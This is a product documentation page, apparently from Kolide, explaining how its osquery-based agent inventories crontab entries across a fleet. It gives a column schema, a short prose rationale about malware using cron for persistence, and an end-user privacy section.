How to List Crontab Entries Across All Mac, Windows, and Linux Devices
Using Kolide, you can easily view and query Crontab Entries across your fleet.
Introduction
macOS and Linux devices have a file called crontab which is responsible for managing scheduled tasks. A crontab file contains the instruction set for a device's cron daemon in the following simplified manner: "run X command, at Y time, on Z date". Each user can define their own crontab. Commands defined in a crontab are executed under the user (with their accompanying permissions) who owns that particular crontab.
The crontab inventory contains information about the commands scheduled to run, the user context to run them in, and the interval they will run on.
What Crontab Entry Data Can Kolide Collect?
Kolide's endpoint agent bundles in osquery to efficiently collect Crontab Entries from Mac, Windows, and Linux devices in your fleet. Once collected, Kolide will parse, clean up, and centrally store this data in Inventory for your team to view, query, or export via API.
Kolide meticulously documents every piece of data returned so you can understand the results.
Crontab Entries Schema
| Column | Type | Description | |
|---|---|---|---|
| id | Primary Key |
Unique identifier for the object |
|
| device_id | Foreign Key |
Device associated with the entry |
|
| device_name | Text |
Display name of the device associated with the entry |
|
| command | Text |
Raw command string |
|
| day_of_month | Text |
The day of the month for the job |
|
| day_of_week | Text |
The day of the week for the job |
|
| event | Text |
The job @event name (rare) |
|
| hour | Text |
The hour of the day for the job |
|
| minute | Text |
The exact minute for the job |
|
| month | Text |
The month of the year for the job |
|
| path | Text |
File parsed |
|
| collected_at | Timestamp |
Time the row of data was first collected in the database |
|
| updated_at | Timestamp |
Time the row of data was last changed in the database |
|
Why Should I Collect Crontab Entries?
Because crontab has the ability to silently execute commands on a device on a recurring basis, it is a common target for malware in order to act as a persistence mechanism. For example, if a malicious piece of software wanted to exfiltrate the contents of your Chrome Browser history, it could schedule a cronjob which posted a remote connection to a filedrop URL and uploaded your Chrome/History database.
For this reason, it is important for IT administrators to be able to review and audit the contents of the crontab to ensure no malicious entries have been made which might be indicators of compromise.
End-User Privacy Consideration
Kolide practices Honest Security. We believe that data should be collected from end-user devices transparently and with privacy in mind.
Because the crontab can be used by end-users in a totally customizable way, it is possible that you could add entries which contain sensitive or suggestive information. For example, you could configure a cronjob which performed a timecard service check-in at a specified interval, in the morning and afternoon, everyday of the week while you were not at your device. Likewise, you could configure the crontab to reach out to a private IP or domain as part of a backup service.
When you use Kolide to list Crontab Entry data from end-user devices, Kolide gives the people using those devices insight into exactly what data is collected, the privacy implications, and who on the IT team can see the data. This all happens in our end-user privacy center which can be accessed directly by employees.
